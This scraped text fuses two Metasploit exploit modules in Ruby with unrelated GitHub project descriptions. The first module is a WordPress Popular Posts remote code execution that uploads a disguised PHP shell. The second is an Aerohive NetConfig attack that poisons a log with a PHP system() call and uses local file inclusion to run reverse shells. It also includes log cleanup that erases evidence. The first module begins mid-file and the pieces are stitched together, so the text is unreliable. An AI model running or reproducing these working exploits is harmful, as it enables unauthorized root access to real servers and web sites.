checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? 
' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. 
Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? 
"<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? 
vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. 
This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
AnamolZ / Exploitation: The Metasploit Exploitation - EternalBlue SMB Exploit module within the Metasploit framework enables security professionals and researchers to test the vulnerability and assess its impact on target systems. This module can also be used to develop custom payloads and exploit techniques for further research and analysis.
ChengChen-Steven / Real Time Excavation Positioning Of Roadheader Based On Visual Measurement: Visual measurement is a construction positioning method developed in recent years. Combining visual measurement with on-site Guiyang subway construction, this paper proposes an automatic positioning method for roadheader excavation, replacing human vision with machine vision and changing current practice in tunnel excavation. First, a laser beam is projected from a distance onto the tunnel face. Pictures taken by a camera mounted on the body of the roadheader are analyzed digitally in the RGB color space by a computer model built in MATLAB. The model extracts the centers of the laser spots. Then, based on mathematical analysis of the digital image, the model gives the decoupled eigenvalues of the positional relationship between the actual position and the standard position of the roadheader in the three principal directions, so as to effectively guide construction and enable automation. The paper also reports experiments that compare the characteristics of a single laser spot under RGB decomposition, test the model's accuracy in extracting the image of the laser beam, and use a similar model to analyze the impact of camera distortion in actual work.
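As a rough illustration of the RGB-decomposition step described above, the sketch below isolates pixels where the red channel clearly dominates (the laser spot) and returns their centroid as the spot center. The threshold and the use of Pillow/NumPy instead of MATLAB are assumptions, not the paper's calibrated model.

```python
# Sketch: find the centroid of a red laser spot via simple RGB decomposition.
import numpy as np
from PIL import Image

def laser_spot_center(image_path: str, red_margin: int = 60):
    """Return the (x, y) pixel centroid of the red-dominant laser spot, or None."""
    rgb = np.asarray(Image.open(image_path).convert("RGB")).astype(int)
    red, green, blue = rgb[..., 0], rgb[..., 1], rgb[..., 2]
    mask = (red - np.maximum(green, blue)) > red_margin   # red clearly dominates
    ys, xs = np.nonzero(mask)
    if xs.size == 0:
        return None
    return float(xs.mean()), float(ys.mean())

# center = laser_spot_center("tunnel_face.jpg")  # placeholder image path
```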
jqassistant-archive / Jqassistant Test Impact Analysis Plugin: jQAssistant plugin for analyzing impact on tests based on changes in Git repositories.
systemgroupnet / SG.CodeCoverage: 🧪 A code coverage library, used for Test Impact Analysis (or Continuous Testing) in our internal testing framework.
thanhminhmr / JavaCIA: Java Change Impact Analysis, a library that parses two consecutive versions of a Java project and produces advice about where (not) to do regression testing on your program.
SunnyDayDev / Test Impact Plugin: Plugin for running tests based on impact analysis of changes.
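The test-impact projects listed above share one core idea: compute the set of files changed between two revisions and run only the tests that plausibly cover them. The sketch below shows that idea in Python using git and a file-naming convention; the origin/main base, the tests/ layout and the test_<module>*.py convention are assumptions, not how any specific plugin maps changes to tests.

```python
# Sketch: select tests to run from the files changed between two git revisions.
import subprocess
from pathlib import Path

def changed_files(base: str = "origin/main", head: str = "HEAD") -> list:
    """List files touched between two revisions using git."""
    out = subprocess.run(
        ["git", "diff", "--name-only", f"{base}...{head}"],
        capture_output=True, text=True, check=True,
    )
    return [line for line in out.stdout.splitlines() if line]

def impacted_tests(changes, test_dir: str = "tests") -> set:
    """Map changed modules to test files via a test_<module>*.py naming convention."""
    selected = set()
    for change in changes:
        stem = Path(change).stem              # e.g. src/payments.py -> payments
        selected.update(Path(test_dir).glob(f"test_{stem}*.py"))
    return selected

if __name__ == "__main__":
    tests = sorted(str(t) for t in impacted_tests(changed_files()))
    print("Run only:", ", ".join(tests) if tests else "<no match; run the full suite>")
```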
Edgar-Mendonca / Split Hopkinson Pressure Bar Analysis Tool: SHPB PROCESSING is a Split Hopkinson Pressure Bar analysis application used for interpreting the signals obtained from experiments conducted on a Split Hopkinson Pressure Bar setup for high-velocity impact tests.
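For context on what such a tool computes, the sketch below applies the standard one-wave SHPB reduction (elastic bars assumed): specimen strain rate from the reflected pulse, strain by integration, and stress from the transmitted pulse. Bar properties, sampling step and gauge signals are placeholders, and the actual tool will differ in details such as pulse alignment and dispersion correction.

```python
# Sketch: classic one-wave SHPB reduction from reflected/transmitted strain pulses.
import numpy as np

def shpb_one_wave(eps_refl, eps_trans, dt, c0, E_bar, A_bar, A_spec, L_spec):
    """Return specimen strain rate, strain and stress from bar strain-gauge pulses."""
    strain_rate = -2.0 * c0 / L_spec * np.asarray(eps_refl)    # specimen strain rate
    strain = np.cumsum(strain_rate) * dt                       # integrate over time
    stress = E_bar * (A_bar / A_spec) * np.asarray(eps_trans)  # specimen stress
    return strain_rate, strain, stress

# Placeholder call with invented bar properties (steel-like bar, small specimen):
# rate, eps, sigma = shpb_one_wave(eps_r, eps_t, dt=1e-7, c0=5000.0,
#                                  E_bar=200e9, A_bar=2.85e-4, A_spec=7.9e-5,
#                                  L_spec=5e-3)
```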
Samudraneel-98 / Cancer Subtype Prediction Using Multi Omics Dataset: Importance of cancer subtype prediction: Cancer is a heterogeneous disease caused by chemical, physical, or genetic factors. Identification of cancer subtypes is of great importance to facilitate cancer diagnosis and therapy. Bioinformatics approaches have gradually taken the place of clinical observations and pathological experiments. The development of high-throughput genome analysis techniques for the research of cancer subtypes plays an important role in the analysis and clinical treatment of various kinds of cancers.
Omics datasets: Since the process of mapping and sequencing the human genome began, new technologies have made it possible to obtain a huge number of molecular measurements within a tissue or cell. These technologies can be applied to a biological system of interest to obtain a snapshot of the underlying biology at a resolution that has never before been possible. Broadly speaking, the scientific fields associated with measuring such biological molecules in a high-throughput way are called omics. Omics are novel, comprehensive approaches for the analysis of complete genetic or molecular profiles of humans and other organisms. The types of omics data that can be used to develop an omics-based test include genomics, proteomics, transcriptomics and metabolomics.
Importance of omics data for cancer prediction: Accurately predicting cancer prognosis is necessary to choose precise treatment strategies for patients. One effective approach to this prediction is the integration of multi-omics data, which reduces the impact of noise within any single omics dataset. A number of methods have been proposed in recent years to integrate multi-source data to identify cancer subtypes. Based on these types of expression data, various computational methods have been proposed to predict cancer subtypes, and it is crucial to study how to better integrate these multiple data profiles. Approaches to omics data concatenation include: 1. Integrative NMF, 2. Similarity Network Fusion, 3. Joint Non-negative Matrix Factorization.
Deep learning: Deep learning is an artificial intelligence (AI) function that imitates the workings of the human brain in processing data and creating patterns for use in decision making. Deep learning is a subset of machine learning in artificial intelligence whose networks are capable of learning unsupervised from data that is unstructured or unlabeled.
Hyperparameter tuning: Hyperparameter tuning works by running multiple trials in a single training job. Each trial is a complete execution of your training application with values for your chosen hyperparameters, set within limits you specify. The AI Platform Training service keeps track of the results of each trial and makes adjustments for subsequent trials. When the job is finished, you can get a summary of all the trials along with the most effective configuration of values according to the criteria you specify.
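As a simplified illustration of the concatenation-style integration mentioned above, the sketch below stacks rescaled omics matrices for common samples, factorizes the result with NMF, and clusters the sample factors into candidate subtypes. The file names, component count and cluster count are assumptions, and plain NMF on concatenated blocks is only a rough stand-in for true integrative or joint NMF.

```python
# Sketch: concatenate omics layers, factorize with NMF, cluster samples into subtypes.
import pandas as pd
from sklearn.cluster import KMeans
from sklearn.decomposition import NMF
from sklearn.preprocessing import minmax_scale

# Placeholder inputs: one samples-by-features table per omics layer.
expr = pd.read_csv("gene_expression.csv", index_col=0)
meth = pd.read_csv("methylation.csv", index_col=0)
mirna = pd.read_csv("mirna.csv", index_col=0)

# Rescale each block to [0, 1] so NMF's non-negativity constraint holds,
# then keep only samples present in every layer.
blocks = [pd.DataFrame(minmax_scale(b), index=b.index, columns=b.columns)
          for b in (expr, meth, mirna)]
X = pd.concat(blocks, axis=1, join="inner")

factors = NMF(n_components=10, init="nndsvda", random_state=0).fit_transform(X)
subtypes = KMeans(n_clusters=4, n_init=10, random_state=0).fit_predict(factors)
print(pd.Series(subtypes, index=X.index).value_counts())
```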
SoniSiddharth / Impact Analysis: Impact analysis of software change leveraging ML and NLP models over a huge number of test cases and requirement documents written in English, using the Universal Sentence Encoder (USE) model.
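As a rough stand-in for the USE-based matching this project describes, the sketch below ranks test cases against a changed requirement by TF-IDF cosine similarity; the sample strings are invented, and a real pipeline would swap the vectorizer for Universal Sentence Encoder embeddings.

```python
# Sketch: rank test cases by textual similarity to a changed requirement.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Invented examples of test-case descriptions and one changed requirement.
tests = [
    "Verify that a declined card shows an error on the checkout page",
    "Ensure the invoice PDF totals match the order line items",
    "Check that password reset emails expire after 24 hours",
]
changed_requirement = "Checkout must reject expired or declined payment cards"

vectorizer = TfidfVectorizer(stop_words="english")
matrix = vectorizer.fit_transform(tests + [changed_requirement])
scores = cosine_similarity(matrix[-1], matrix[:-1]).ravel()

# Rank test cases by similarity to the changed requirement.
for test, score in sorted(zip(tests, scores), key=lambda pair: -pair[1]):
    print(f"{score:.2f}  {test}")
```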